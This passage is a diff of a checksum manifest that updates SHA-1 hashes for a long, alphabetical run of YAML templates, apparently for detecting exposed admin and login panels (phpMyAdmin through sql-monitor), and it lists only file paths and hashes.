+http/exposed-panels/phpmyadmin-panel.yaml:72d61ed4fde0c716d1f36529ccaf70992540c45d +http/exposed-panels/phppgadmin-panel.yaml:0990d0bbf992a52eba48e9a964f45a4d0ae865af +http/exposed-panels/pichome-panel.yaml:0eda128a5f2a2773dc6c7584667dcdf45b176c9d +http/exposed-panels/piwigo-panel.yaml:7b8fb4c3735bf6813d5ae8cde6fe30c2987fc590 +http/exposed-panels/planet-estream-panel.yaml:bf5cb52c8ccd15ac05c863e2c2d7fe42d1a9acf8 http/exposed-panels/plastic-scm-login.yaml:fe6d092c51727b09cb9451654271bd3e5e674a71 -http/exposed-panels/plausible-panel.yaml:618d3a4a135c8e80ca35582a0620bcb2d300c63f -http/exposed-panels/plesk-obsidian-login.yaml:7f424a234fc5e054a1186ed9fdf7fa84780e66a6 -http/exposed-panels/plesk-onyx-login.yaml:f423044e8413a51421c210b0f4f49445efb4606c -http/exposed-panels/pocketbase-panel.yaml:fb5f9369e3ec6a95be6cf0dec0f2fc70639e8176 -http/exposed-panels/polycom-admin-detect.yaml:09ff65e682061de9f992c4c4539615e0a62fdc4c +http/exposed-panels/plausible-panel.yaml:8a508565c07003a3d51357ad2f97c5272b54f14e +http/exposed-panels/plesk-obsidian-login.yaml:504284bd19da05c5b4286f6b26e933bb47ac54d5 +http/exposed-panels/plesk-onyx-login.yaml:991a3f9d80768946d9089fb94856aa68ee921d9a +http/exposed-panels/pocketbase-panel.yaml:b416e94f4cceebb151bfe73d78be881234f33542 +http/exposed-panels/polycom-admin-detect.yaml:25f333ba200ec3b31a8f96469f46e1ce9d492847 http/exposed-panels/polycom-login.yaml:9dfb75c477c1d850cb3c4e767e5f1027c65c7e01 -http/exposed-panels/portainer-panel.yaml:e3b502c10ccb719774f551f98c8676d5b60c0403 -http/exposed-panels/posteio-admin-panel.yaml:8a464586f38dd15641c5023877f1528001dc2b7e -http/exposed-panels/posthog-admin-panel.yaml:d7aa9e309340465b93e4c6a717c29ce0e26656c7 +http/exposed-panels/portainer-panel.yaml:85d26f069e2b959afc5e2a4d91d1904452ecd62c +http/exposed-panels/posteio-admin-panel.yaml:918aeedd672fd3e17744efc5ead02d93e21c9d8d +http/exposed-panels/posthog-admin-panel.yaml:6a003857b738f49945ed23af8d4eb8d7907b766a http/exposed-panels/powerchute-network-panel.yaml:2f0d91f39e11fb2b5f885ee99b24fedb224e8c87 -http/exposed-panels/powercom-network-manager.yaml:0620116f3d782a315040023059c4dddae7b32065 -http/exposed-panels/powerjob-panel.yaml:fe579283b3c05ba76936dc117496d2237a37de53 -http/exposed-panels/powerlogic-ion.yaml:87eb50a95702f6bc36784264962cf9775bac39e7 +http/exposed-panels/powercom-network-manager.yaml:c48411be49d4b03bc6eaa6a6b47bacd3a962c1cb +http/exposed-panels/powerjob-panel.yaml:ae6332dafba4e8b5b42b210c8f78e9a7b0890848 +http/exposed-panels/powerlogic-ion.yaml:63ec6909ba31b8095ef9a6e1f744b956a08416f4 http/exposed-panels/pritunl-panel.yaml:238b0e6d106843260148ae5dffcd530fa587c1eb http/exposed-panels/privx-panel.yaml:8bc94fa84060bd1664dccb375d8c90c9d53755f0 -http/exposed-panels/processwire-login.yaml:3be37db53b2ab663e70cfe953419732b78c4d7a6 -http/exposed-panels/project-insight-login.yaml:73cd48f898f537ff1ee071e222fbbfb2b2b7c203 -http/exposed-panels/projectsend-login.yaml:9e8276973b81477f5186002f549471b1d9383d99 -http/exposed-panels/prometheus-exposed-panel.yaml:0dc27db00779a5735decdb8f44ff906b09b695dc +http/exposed-panels/processwire-login.yaml:9fd9cd343eb2bb90237dc155aec342fc6df8bbed +http/exposed-panels/project-insight-login.yaml:b77199c57bd2c66bf0983265a488770d8805c41c +http/exposed-panels/projectsend-login.yaml:0f8c8a10ba969b42518741754ebfc4267687d77f +http/exposed-panels/prometheus-exposed-panel.yaml:639e2ce0f6abd2e535bd0a1b4e3d4b831573ae11 http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml:857368867accf4ad72596e16f2f0d90e100a029c -http/exposed-panels/proofpoint-protection-server-panel.yaml:1b0e616bc69f11a9830dac7e6ba11b7ad3e10300 -http/exposed-panels/proxmox-panel.yaml:551fcf6b1feb9448ca1763ec076df96aa2467285 -http/exposed-panels/pulsar-admin-console.yaml:6ef1a1ffc1f832a94418473deff846140eb375fb -http/exposed-panels/pulsar-adminui-panel.yaml:130ff2c13bf1e7d928817c935ff118ef1a93d34f -http/exposed-panels/pulsar360-admin-panel.yaml:16db298f0dbb985a644b196913eb69d5dc1984d9 +http/exposed-panels/proofpoint-protection-server-panel.yaml:6bb2ded05af3f30f9558194b9e223e91996d9eda +http/exposed-panels/proxmox-panel.yaml:474b23aa216b3be55eeb0b4f0b52e038e2c3272b +http/exposed-panels/pulsar-admin-console.yaml:21ed2cd8c1c5241a821048761a2a8d8630766f4c +http/exposed-panels/pulsar-adminui-panel.yaml:98b91e6063948c15519d4c1c8fb5b3e5657d2b71 +http/exposed-panels/pulsar360-admin-panel.yaml:cd7559eff72ee6f8e9c4752ec2b870c9c4056121 http/exposed-panels/pulse-secure-panel.yaml:ed68474661e85ca870ab17f4ce4c9a53665b3dc0 -http/exposed-panels/pulse-secure-version.yaml:37c7ede45908bf639bb69cd4f614d33231d0e428 -http/exposed-panels/puppetboard-panel.yaml:253b53fb43882fb1f21610ef52b09059f894cb6e -http/exposed-panels/pure-storage-login.yaml:8a349115a6b8601c38d776112e97a49659d73173 -http/exposed-panels/pyload-panel.yaml:a750cd22cf3d46f2ab0cfb4091c9442aefe51e7e -http/exposed-panels/pypicloud-panel.yaml:a8e13404f2ea40b2acaad8749a8c69b862e3b5ee -http/exposed-panels/qBittorrent-panel.yaml:0b49b83c08748b4b91db7e36fb06518a6d08ec88 -http/exposed-panels/qdpm-login-panel.yaml:8f5b3e24b7156ab64d0d391ae05c299118ced753 -http/exposed-panels/qlik-sense-server.yaml:4db84c0d1e3d5c1cfab2307ce8711291a039c6da -http/exposed-panels/qlikview-accesspoint-panel.yaml:cd944a5ea2366ac3dc76a3b95ad122a496f77738 -http/exposed-panels/qmail-admin-login.yaml:4ba2c84becd76232e9b799bbc3433797e3d5a1f4 -http/exposed-panels/qnap/qnap-photostation-panel.yaml:c7692c948143c7affd3ec7447e5038fe3ab23c6d -http/exposed-panels/qnap/qnap-qts-panel.yaml:4939e5e7c6952bee595287b84575fad48db6435a -http/exposed-panels/qualcomm-voip-router.yaml:25bb9d3ebf6b906f2e08d43978506b5412fcde6e -http/exposed-panels/qualtrics-login.yaml:1e1edea8d09b34a8ff693f17aa75ca28587f5fd1 -http/exposed-panels/quantum-scalar-detect.yaml:1e580dd2063a6d5f66229d320cbbd5df350fa5ce -http/exposed-panels/quilium-panel.yaml:79e3dbec6325a39e9f5bda6caf81852414b9406a +http/exposed-panels/pulse-secure-version.yaml:cf36258eb57e7ac7cbc977d229ba17097cdbf1f9 +http/exposed-panels/puppetboard-panel.yaml:52145461176e57c84805cb89b1dcce855e83116a +http/exposed-panels/pure-storage-login.yaml:f12e4d56041cc8b570a1567d0159f66fa49e8264 +http/exposed-panels/pyload-panel.yaml:94a6cbe7feed58e3fe68e0f43216e766928cc42b +http/exposed-panels/pypicloud-panel.yaml:ee8c8c7ea0ec112cb52d54371044a6bb213743fd +http/exposed-panels/qBittorrent-panel.yaml:af5b4b89d7b46f7d9d874778aab6bcd6238501bb +http/exposed-panels/qdpm-login-panel.yaml:6d39a304f76a3d3a459cf3a21b468a1167bff643 +http/exposed-panels/qlik-sense-server.yaml:dc2b3093e9466acd247305cfe04a5335563838c4 +http/exposed-panels/qlikview-accesspoint-panel.yaml:80522a3fcc30c0da6f501072ee467c6ecfab289e +http/exposed-panels/qmail-admin-login.yaml:bddc5bcfc8782606ac9a327d4b5416946806291c +http/exposed-panels/qnap/qnap-photostation-panel.yaml:43d4038f300379c55db6ce2b538a5ec49536fed3 +http/exposed-panels/qnap/qnap-qts-panel.yaml:13ab1eab4b14950f82bc7621709b7e0bf93bc566 +http/exposed-panels/qualcomm-voip-router.yaml:2b6a658c65424618c87db442d4d15bcb403ad442 +http/exposed-panels/qualtrics-login.yaml:11b89e24131f71c3665aa61461023a262c5b5e51 +http/exposed-panels/quantum-scalar-detect.yaml:04c64cfa7420f7e9efddb33a03aef1f06623eceb +http/exposed-panels/quilium-panel.yaml:4dc9d0126f6332cf597a93d6284bfa796cf9231d http/exposed-panels/r-webserver-login.yaml:b901e835e99e9315dc07c8e01a9f1a9803e26349 -http/exposed-panels/rabbitmq-dashboard.yaml:0b3f8ede1069e37885c173326cd86d24de86043f -http/exposed-panels/racksnet-login.yaml:0217b25c5ea566922bd466545fef208c365d9f31 +http/exposed-panels/rabbitmq-dashboard.yaml:30e95be944c708b7f3469536db1f761bbedfc461 +http/exposed-panels/racksnet-login.yaml:e75afea84f82cd9d556b17ec05f24f5447a38903 http/exposed-panels/radius-manager.yaml:60d4f6f125af90ac3eecd8537ab50ca567f73e22 -http/exposed-panels/rancher-dashboard.yaml:f5b76b896b81d6515e59109cb0feb9e8bcc41fc8 -http/exposed-panels/rancher-panel.yaml:9f8e5792e4c50bd25d78d974f3c72a7b4c2cc810 +http/exposed-panels/rancher-dashboard.yaml:76f343231f55b13878fce8a4b223f397adc37150 +http/exposed-panels/rancher-panel.yaml:b093246c36791871784b967319bd4f9d35bcd3de http/exposed-panels/raspberrymatic-panel.yaml:c5092f2f1d95cf09589e5326cc291b0631391693 -http/exposed-panels/rcdevs-webadm-panel.yaml:b154e2a68d185946223ae098853f1139d36d9c22 -http/exposed-panels/rdweb-panel.yaml:ae93f0fd0ec1a86e1272ef68d2e687641a70e945 -http/exposed-panels/red-lion-panel.yaml:3069a7ec2e960c21c7ebef0e163dfe412ab1688b -http/exposed-panels/redash-panel.yaml:b38d3605aea7c194af88114d3333bba9ba3b4f3d -http/exposed-panels/redhat/redhat-satellite-panel.yaml:d22be30acc97a640bb0d4469faeec5b57e6602c9 +http/exposed-panels/rcdevs-webadm-panel.yaml:b7b29f2f27c738021c132bb45a7b0fd8b1268536 +http/exposed-panels/rdweb-panel.yaml:a954aba7d1838a79f772f815c1c885dee015c9ca +http/exposed-panels/red-lion-panel.yaml:888b3659332ce755428175a2135a37757273a63b +http/exposed-panels/redash-panel.yaml:f0ed680f08c195db942dd7849e6f48800def0ba1 +http/exposed-panels/redhat/redhat-satellite-panel.yaml:15234eeb3b4dfa93b28515ac84c38d0aa2d0c459 http/exposed-panels/redis-commander-exposure.yaml:9f806530bb77a8e21240a0b569f4bfc6624030e1 -http/exposed-panels/redis-enterprise-panel.yaml:893f07cd05c59924ce51fc578e6d388eba108472 -http/exposed-panels/redmine-panel.yaml:82e1e34b3988afda281b49db2896ea65a3949998 -http/exposed-panels/regify-panel.yaml:917f181e495942a57d907fb5702e8d0746021c6e -http/exposed-panels/remedy-axis-login.yaml:093726b1e5a3e91ec133ba952e1db876e99cb5e2 +http/exposed-panels/redis-enterprise-panel.yaml:c197f21c6c0cbb1102f3cc701dbc2f8a32c387fa +http/exposed-panels/redmine-panel.yaml:ba81080a5c084269044531056576a3aebf080bb0 +http/exposed-panels/regify-panel.yaml:90030d14bb1e0f41f66b7c389a9503c363b58730 +http/exposed-panels/remedy-axis-login.yaml:b9728abe826352ce5213d91b055aa87817ad91b8 http/exposed-panels/remkon-manager-panel.yaml:3be9c805145800d3a1601cd009eb3e7123bed2bd http/exposed-panels/remote-ui-login.yaml:0335d3e84ec1b5927b4e71e30de2fcacd40a33c3 -http/exposed-panels/repetier-server-panel.yaml:13705011ddd8eef48391cd65d6eb57b0b9c30b73 -http/exposed-panels/reportico-admin-panel.yaml:7726b43f10c64fee4d537f74d69c172b49776c69 -http/exposed-panels/residential-gateway-login.yaml:457059f3f0252999f2d2de7e0762e25a6bfb3239 -http/exposed-panels/retool-login.yaml:260d26c579814b5e2808343d897ec1acffbe6560 -http/exposed-panels/riseup-panel.yaml:c2165ed5fb132d3e3ecc4ba5414a05ce65636bd6 -http/exposed-panels/rocketchat-panel.yaml:a117d236e61ef74cad1e1c7cca5ff274c7e5c4c3 -http/exposed-panels/rocketmq-console-exposure.yaml:64a0c6f343318fe651e56f7b69958742f977cbf0 -http/exposed-panels/room-alert-detect.yaml:f0f46be2dec4d94258cb935357ef16017cad8155 -http/exposed-panels/roxy-fileman.yaml:ec074d4b0f2a3eced121b15bb03a780f65cd3505 -http/exposed-panels/royalevent-management-panel.yaml:6ee5bba3fce53b98fdeb7628a1a3fb8b5f092e16 +http/exposed-panels/repetier-server-panel.yaml:1a53dab4663839582a9637c48a433091d51f2aaf +http/exposed-panels/reportico-admin-panel.yaml:fcf132a79a7ea9b896116752b79b16932ee64095 +http/exposed-panels/residential-gateway-login.yaml:49ae9a55df83d2858ffc1a15059e027238e5a6b7 +http/exposed-panels/retool-login.yaml:105bafc7998ff9bbe49f96a38fb5d90086fc7c66 +http/exposed-panels/riseup-panel.yaml:ba1f41725fe006c2187b9d666625eb7e42a3dbec +http/exposed-panels/rocketchat-panel.yaml:12636d75d722ed3b912f1c226913182e5456d546 +http/exposed-panels/rocketmq-console-exposure.yaml:fc41c4c81f2039692b6a02daa3632aa76096fd8e +http/exposed-panels/room-alert-detect.yaml:f18fb52e0ed8eb1d15d1c93f63be53ee5ed84e4e +http/exposed-panels/roxy-fileman.yaml:709cd7414f693d94d4fb9c6cd6aaa9a1ae078353 +http/exposed-panels/royalevent-management-panel.yaml:6f994a1378b2d9a50cbbeff009fe25901e8ce22c http/exposed-panels/rsa-self-service.yaml:3605adb7ec03d1b3c7a3acaf8b0610b962ffd777 http/exposed-panels/rstudio-detect.yaml:fabf4c96df4e6e8c7f53af015182d8d854586d6d http/exposed-panels/rtm-web-panel.yaml:8c7511da0903c4d24352b4729aa86e24a3f100af -http/exposed-panels/ruckus-unleashed-panel.yaml:17d378752f373eefb24c0361effbaafc966a6dd2 -http/exposed-panels/ruckus-wireless-admin-login.yaml:cfe59de5d5a2054cb2e27eac76194b05ed07665f -http/exposed-panels/ruijie/rg-uac-panel.yaml:cd76b8b9575477eafa61e1f830963b0389331767 -http/exposed-panels/rundeck-login.yaml:741c8c2877b0cb68dc02084c23267475b3cdd88a -http/exposed-panels/rustici-content-controller.yaml:0cdea4097ee9ed684d1af6e7dbf48141f8ebaaba -http/exposed-panels/safenet-authentication-panel.yaml:502ec47a8715a848f66e9f5e176d08780b1453e8 +http/exposed-panels/ruckus-unleashed-panel.yaml:b0601170b6e322b908e0c5b322a7c624ca68e59f +http/exposed-panels/ruckus-wireless-admin-login.yaml:95e89fef391a3f5055f63af8767853a263c60c44 +http/exposed-panels/ruijie/rg-uac-panel.yaml:ca6888a10bc0bddf81bc2e0b6212948005a00319 +http/exposed-panels/rundeck-login.yaml:75db9d2a2910d70c68d657de7bdbc860e352d516 +http/exposed-panels/rustici-content-controller.yaml:eb3e72a535e1f43297b1d2dcdddcb00f22f2eea4 +http/exposed-panels/safenet-authentication-panel.yaml:867fd97d1c0ddf7673122a60696d717296d2cdb2 http/exposed-panels/saferoads-vms-login.yaml:ecd5016a57c9629a8ec4d9c8772d649bc5360600 -http/exposed-panels/sage-panel.yaml:9ddc58634918fc00e2627e5aa3bce45119d54f5a +http/exposed-panels/sage-panel.yaml:f09cf0241b4e3eefcf68360fe862d9f942591662 http/exposed-panels/saltgui-panel.yaml:a43ccb77fd00b06dc79a011d5d849a72666ecd20 -http/exposed-panels/saltstack-config-panel.yaml:32ab00c4ba3e0d428789283d7ce728c2a5d5eaee -http/exposed-panels/samba-swat-panel.yaml:7a534c445d709a814509a4687e8358c59f5830ef -http/exposed-panels/samsung-printer-detect.yaml:da558bce903c218cc5aa265a7d874f15364eb2b6 -http/exposed-panels/sap-cloud-analytics.yaml:e844d824326906c1eced644c3f16ad8e0afeeca8 +http/exposed-panels/saltstack-config-panel.yaml:4ddd5fece4a2b66aa5dd192aadd044aef8d2f59c +http/exposed-panels/samba-swat-panel.yaml:fab5c731c3ac4e10bda1ce4d2333231f26b7a8ae +http/exposed-panels/samsung-printer-detect.yaml:9b3eaaf5d8fa4bbf4f3af04db513c32a82d93955 +http/exposed-panels/sap-cloud-analytics.yaml:b0a2ce93b78d5af8b85df3e80b078abc7393adef http/exposed-panels/sap-hana-xsengine-panel.yaml:5efdbcb4827cedc32651ceac2f45229d51dcba8f -http/exposed-panels/sap-netweaver-portal.yaml:d62a846f40179bf15fe5820c42703ce7366a4a93 -http/exposed-panels/sap-successfactors-detect.yaml:dc23846722744f8068894bb07af2e02913f37402 -http/exposed-panels/sapfiori-panel.yaml:a268f43257e916fa6b83b803f2728e941ee704c3 -http/exposed-panels/sas-login-panel.yaml:d768a2d97c6ebcc2f9ca29ff861c06d96d338724 -http/exposed-panels/satis-repository.yaml:abc2ba878e6b18125652ce2352e0f584736042e8 +http/exposed-panels/sap-netweaver-portal.yaml:165dfebaee67a8eda6d6926d14d8e1188a2d46c3 +http/exposed-panels/sap-successfactors-detect.yaml:628a57b712806d1c66692f73241754c7e479bf5b +http/exposed-panels/sapfiori-panel.yaml:8f8748a22e28c19b412a6d683a5cfc3d2b41bcde +http/exposed-panels/sas-login-panel.yaml:a81e8d1fc477e0b08f92a951a805e4e0016a4b49 +http/exposed-panels/satis-repository.yaml:5777605cf976ae058ceb7c33216dd31f28cf940a http/exposed-panels/sauter-login.yaml:e1f8ceca9423ef31c8451664a2d3a92497c18a8f -http/exposed-panels/sauter-moduwebvision-panel.yaml:4fb59d29b2ff41c2b01d5ed3e4b273b76c69d487 -http/exposed-panels/scribble-diffusion-panel.yaml:90757973ba3d57aabc4f6183bc649e43f843428f -http/exposed-panels/scriptcase/scriptcase-panel.yaml:daf66edc6b9f13ab73e9e773d93e5ee859d1d39e -http/exposed-panels/scriptcase/scriptcase-prod-login.yaml:1a57c31e3ed8635d8c55a8ad72c6aaafac71baa8 +http/exposed-panels/sauter-moduwebvision-panel.yaml:a4f843bfdf39c9ac7d8f74616dbfbd0a685e46f6 +http/exposed-panels/scribble-diffusion-panel.yaml:1e7e56f3624652d6dcff393278ad05cd17384094 +http/exposed-panels/scriptcase/scriptcase-panel.yaml:4fe5fa99638075b6a4afd5e96e9a63b0c12d2713 +http/exposed-panels/scriptcase/scriptcase-prod-login.yaml:17e43187c8dfc90cfab0eeb52f05d2424ff8283c http/exposed-panels/scs-landfill-control.yaml:860b58e91541fd55e971d75bb34fb407cef1a35a -http/exposed-panels/seafile-panel.yaml:8ef2b5721b0141adc8ce9501c0d6d50b1228ec8b -http/exposed-panels/seagate-nas-login.yaml:9af073ddf38ea4b6aa8056361ebe70d98b0e257c +http/exposed-panels/seafile-panel.yaml:12cdf7d2d3cb406b0fa05493b6d26cba9143dffb +http/exposed-panels/seagate-nas-login.yaml:5845137e5adbdb743ec8dff1cebc23329aeaabb8 http/exposed-panels/seats-login.yaml:282ab0781e3e562fdb1055fdbb974b15b4a0f9cc http/exposed-panels/secmail-detect.yaml:216d17b9d58ada4e71f28b5c5b84ba62cd239f18 http/exposed-panels/secnet-ac-panel.yaml:77f8b7f79204cfee5844e36fd3dc82d23c0df0c7 http/exposed-panels/secure-login-panel.yaml:2f8a8ecab568637abd7d48cb1b39b3d7e8b043f4 http/exposed-panels/securenvoy-panel.yaml:1a70d0c2fe11ad60685ae0ddcb8d0e4c6a15ccc8 -http/exposed-panels/securepoint-utm.yaml:e67614e8e854909b75fcb5d1cbbdde0e1dc9b346 -http/exposed-panels/security-onion-panel.yaml:5386c1ea4bbc674ebe32e0ce6619ae9079b75aab +http/exposed-panels/securepoint-utm.yaml:45f45546f52b92386ad3cace04a0364f0c1e5f1b +http/exposed-panels/security-onion-panel.yaml:a530b23be35b0c8bddfdf96878b09abb361b8e6e http/exposed-panels/securityspy-detect.yaml:22d838a8705ad7ac9bd149a569eb71f1c5ac4900 -http/exposed-panels/seeddms-panel.yaml:8b1501412413869343e2077b0bb8bbff52de43ab +http/exposed-panels/seeddms-panel.yaml:15a9f136ab22a3b28562ad4a3ce3e3cdacb5a0ad http/exposed-panels/selenium-grid.yaml:95ea916c3beafe799f984ee79d405814f6d4a975 http/exposed-panels/selenoid-ui-exposure.yaml:da7ccae76478fb4e528e9b83b540e9d5b13788c5 -http/exposed-panels/selfcheck-panel.yaml:160b951898d1f93a53c3ccfb48c5085f8c5250fa -http/exposed-panels/sensu-panel.yaml:a5515e2b6ad07f1517071bd24f04012c6413088c -http/exposed-panels/sentinelone-console.yaml:80d8982de72149b4e99e3c4862c1ea2dfd976ea6 -http/exposed-panels/sentry-panel.yaml:bb82cf33ec0a9bf7638fe27832c6d433d1a4935f +http/exposed-panels/selfcheck-panel.yaml:ad5c3a3cc24dfdceffee5ecce64c2559d67cb685 +http/exposed-panels/sensu-panel.yaml:5fafb785701cabcbd05e8c5aeee98bc632bf8730 +http/exposed-panels/sentinelone-console.yaml:4ab9b35176c99c96f5569d6cc87df871cfa8526f +http/exposed-panels/sentry-panel.yaml:5d3c053bdff6708a8e2035c9ef4f807af53a38d6 http/exposed-panels/sequoiadb-login.yaml:cf5ca2143a250fdd05f8eefae9fdda26f1bdd130 http/exposed-panels/server-backup-login.yaml:0518609c4c3b61c10f401cfa90c0eb2141d10169 http/exposed-panels/server-backup-manager-se.yaml:7c3b1ebb1d9c5ba8966cbf7e41070da2b6507a91 -http/exposed-panels/servicedesk-login-panel.yaml:693fb29d2a1bdd16cf97e0ce737c360164a4e5de -http/exposed-panels/servicenow-panel.yaml:8e06fba4003fe3f9f3683ce7b6eed288a882815a -http/exposed-panels/sevone-nms-network-manager.yaml:5b040af8cf8fb77b7928f44ab5d43b293fae0fb7 +http/exposed-panels/servicedesk-login-panel.yaml:0d9dc28db4e8a422ff5671df2af41be3223e6c66 +http/exposed-panels/servicenow-panel.yaml:d366b347f5f255a9245e1ef3ac970332fdb47bd6 +http/exposed-panels/sevone-nms-network-manager.yaml:15dfb9c39bb9dc1fcd861042d463224c36764468 http/exposed-panels/sgp-login-panel.yaml:eda5cfa7dcf79833435c62206e08dc7bf62ce052 -http/exposed-panels/shardingsphere-panel.yaml:5952eac1549c722881b7131c474685d418358205 +http/exposed-panels/shardingsphere-panel.yaml:0af884624df902de41916f795c29444a953ffe3b http/exposed-panels/sharecenter-login.yaml:8a97d08353758d6ba019951d7c0fdfe4a6614a44 -http/exposed-panels/sharefile-panel.yaml:c26320657f2fffeac5f2440ed804bd01b5f9643b -http/exposed-panels/shell-box.yaml:7359116bba5518435b35db8d4e564417dd8aab8e +http/exposed-panels/sharefile-panel.yaml:61c63a90eb8df7c473530c441032c0b108c0c62d +http/exposed-panels/shell-box.yaml:220cbf047561844d2d4a5c97ba95adf86871f4ba http/exposed-panels/shoutcast-server.yaml:58c0d3d328d1cbcb11f70ca0feaf65c42abbfc7a http/exposed-panels/sicom-panel.yaml:1cad3713fd6433d42cef33e70cbfa9cdb861de0b -http/exposed-panels/sidekiq-dashboard.yaml:feee05681dc27164d5486ee6b79b91e1103a2112 -http/exposed-panels/signet-explorer-dashboard.yaml:80595b8565c0be6ad710b576394932914e927a68 +http/exposed-panels/sidekiq-dashboard.yaml:4538271c60906df0271de8bdc4dcf992acc40858 +http/exposed-panels/signet-explorer-dashboard.yaml:d01660ec0a44af2f09a4f2bc8bb583deb672482e http/exposed-panels/sitecore-login-panel.yaml:9ed19e74abc57c48ee2eb2980baefb3e7db72178 http/exposed-panels/sitecore-login.yaml:fb2b06e1281f0c978da9a90073c311c0731e904c -http/exposed-panels/sitefinity-login.yaml:9cc4ada124dfc0ab8b784a59fadd7eb23c0ccef0 -http/exposed-panels/siteomat-login.yaml:901b55991a5815959c7507b6e458a3e19a6bcbff -http/exposed-panels/skeepers-panel.yaml:6ce43f2a5fec4f736b9e735456fe4fb2e1999dea -http/exposed-panels/skycaiji-admin-panel.yaml:b7686a58b10285fa4566298535b357d8f5d710f2 +http/exposed-panels/sitefinity-login.yaml:41e558a34bbbba88facf292714943cf02bf49017 +http/exposed-panels/siteomat-login.yaml:423b4955ba1cce69f57d4ecb08162d094d41ca00 +http/exposed-panels/skeepers-panel.yaml:1fc2fa2637a24f2d1111f6bdc4082ae772341986 +http/exposed-panels/skycaiji-admin-panel.yaml:4e835c68b49b000fdc5b03019994200d01b7cc7f http/exposed-panels/slocum-login.yaml:a35da66be2dbacfb241e9035c43c5f63564a090c -http/exposed-panels/smartping-dashboard.yaml:516f07846aeab26f9b012ae1d7cd1d2164c89044 -http/exposed-panels/snapcomms-panel.yaml:c42de04de3e3fe2e54e0ef582ae8c3a10baf0eb4 -http/exposed-panels/softether-vpn-panel.yaml:8d9361697b8353732607d21dc5105f3bb716ff38 -http/exposed-panels/solarview-compact-panel.yaml:737b4aa6f6e45597bc72688efa27ec47e80c936b -http/exposed-panels/solarwinds-arm-panel.yaml:07b19631fbc6a08cc1caddcf1b39ddef4ee7e2ea -http/exposed-panels/solarwinds-orion.yaml:1731eb92b4d7b67415b893fde15ebfe9d60ad653 -http/exposed-panels/solarwinds-servuftp-detect.yaml:04cabe175ff0bca2190f031d9a8aa2830de96c0d -http/exposed-panels/solr-panel-exposure.yaml:e987a9ac54d459351da1c6cf0f7ae66cc48f86d8 -http/exposed-panels/somansa-dlp-detect.yaml:66026ec74cb7cf119c0d10b37eca41d462d9b37d +http/exposed-panels/smartping-dashboard.yaml:5294192c06aa4bffd4ada5dde57f304b25fe632f +http/exposed-panels/snapcomms-panel.yaml:75a5b7995cdb9449c6b7e20495b43adf01e7c9d8 +http/exposed-panels/softether-vpn-panel.yaml:1f7d2d03ef4bd10a8ba941b67cfe21381029f338 +http/exposed-panels/solarview-compact-panel.yaml:3d48f7c719ababc32b1196c578997aa6871bf258 +http/exposed-panels/solarwinds-arm-panel.yaml:027c217824f909617e029ce3163fa6a54dea6fd0 +http/exposed-panels/solarwinds-orion.yaml:ea9e1657c3e15c5bee09da978dfc06fbae562dcb +http/exposed-panels/solarwinds-servuftp-detect.yaml:9d5ca34cf1b921b933407e0e1934c54fee6a85df +http/exposed-panels/solr-panel-exposure.yaml:0deaf8e924117cb90652fa839ccf27f4b6e26732 +http/exposed-panels/somansa-dlp-detect.yaml:ae175af5690e2ee93a3ba34eac5d7cafed65fe93 http/exposed-panels/somfy-login.yaml:4e2cfce42b93c29cb47261d4954eea1f6c18b848 -http/exposed-panels/sonarqube-login.yaml:053fe75dffa332fb90e769ebd47c85a498b96af1 -http/exposed-panels/sonic-wall-application.yaml:d2c0d5aefa83a076ed1bb9b8413d20d21318092b -http/exposed-panels/sonic-wall-login.yaml:35ac9951697e16e09ee62f53a94be9c8ae5d96d6 -http/exposed-panels/sonicwall-analyzer-login.yaml:e8ebfd38e504f15a3d6a7cba070579099d64fa73 -http/exposed-panels/sonicwall-management-panel.yaml:f1237e32928047dbaef9f228b299f6cac613c564 -http/exposed-panels/sonicwall-sslvpn-panel.yaml:6eae604fdaa36df502b30619f07553a0f86432b4 -http/exposed-panels/sophos-fw-version-detect.yaml:4e5cde3ea91091d9963dd890ea272cdd1254171d -http/exposed-panels/sophos-mobile-panel.yaml:f2f2e8764a5d06a4c777712abbade36a0df30287 -http/exposed-panels/sophos-web-appliance.yaml:0478cc7fc507b0390b5f447d6b4af337a9b3807a -http/exposed-panels/spacelogic-cbus-panel.yaml:070bb1cd0a7f46d2cd055af0cc24f471d7f400c9 -http/exposed-panels/spark-panel.yaml:8c09e17d6bc985e2004a562779dfc7aa80a592c2 -http/exposed-panels/speedtest-panel.yaml:46ac69fef36d7110e3bc926cb18826daa6b724ad -http/exposed-panels/sphider-login.yaml:eb636b5046ed469118a608bb2f9e9ce63edd845c -http/exposed-panels/sphinxonline-panel.yaml:76a1872f8965fc695c1560793d9a45b27f0f8390 +http/exposed-panels/sonarqube-login.yaml:4c138031e198b03bcdfb289c5b0829a5b0b25a26 +http/exposed-panels/sonic-wall-application.yaml:7ea47d40cc0ae1656033d0fb65c324faf13ef7af +http/exposed-panels/sonic-wall-login.yaml:47e385f385c47b4691983ef77f3c4cbcf9f329db +http/exposed-panels/sonicwall-analyzer-login.yaml:d681640d54b3b84f87a7befec2247320aa754e59 +http/exposed-panels/sonicwall-management-panel.yaml:0876e71e97cbbd256fe638fb7494103686f3d2c0 +http/exposed-panels/sonicwall-sslvpn-panel.yaml:1fd870f9b9240683f8be03a2451293175182d5bb +http/exposed-panels/sophos-fw-version-detect.yaml:779f1ced76f8fc698e7fe646ea4c9c0a57ec6dec +http/exposed-panels/sophos-mobile-panel.yaml:0d23fc46251766ea81fd428075715a37b500340e +http/exposed-panels/sophos-web-appliance.yaml:271636675ab273c7923f1bd6aea62c010a91cf0f +http/exposed-panels/spacelogic-cbus-panel.yaml:a9922996b4aeb1002c53ad9be0c19ed7dc2de7c0 +http/exposed-panels/spark-panel.yaml:81e6d01fa33536d4728123a98e059f5a146d8e8c +http/exposed-panels/speedtest-panel.yaml:426219cb6366d4bc414814742e06b5db1f1b7844 +http/exposed-panels/sphider-login.yaml:21f57f697228d533a07b2e94b6f97104a31476f7 +http/exposed-panels/sphinxonline-panel.yaml:85f8042c99bcdfc52a76ab628353c0fd394d32ec http/exposed-panels/spiderfoot.yaml:f240378bdf6c2a41695b9f332fa80e95e3d5e524 -http/exposed-panels/splunk-enterprise-panel.yaml:692156393062dac3cb9e5519094e8cbd26946a2d +http/exposed-panels/splunk-enterprise-panel.yaml:5d3ad08dbe9492c956c5c3380bf1fd2f998580c6 http/exposed-panels/splunk-login.yaml:f3e0a45635ae22edbadc7414cde11fbeefa707a3 -http/exposed-panels/spotweb-login-panel.yaml:9baa4a21f896d5069a1e0b2c68606bd56867ff92 -http/exposed-panels/sql-monitor.yaml:92319349bd0cfe1beaf1292c5f21b4aa1e05d242 